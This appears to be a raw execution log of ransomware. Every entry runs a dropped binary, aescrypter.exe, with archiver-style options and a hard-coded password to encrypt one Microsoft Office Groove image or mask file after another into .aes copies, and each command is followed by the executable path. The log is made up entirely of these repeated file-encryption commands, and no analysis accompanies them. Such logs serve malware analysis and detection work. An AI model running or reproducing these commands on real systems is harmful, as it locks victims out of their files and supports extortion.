"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
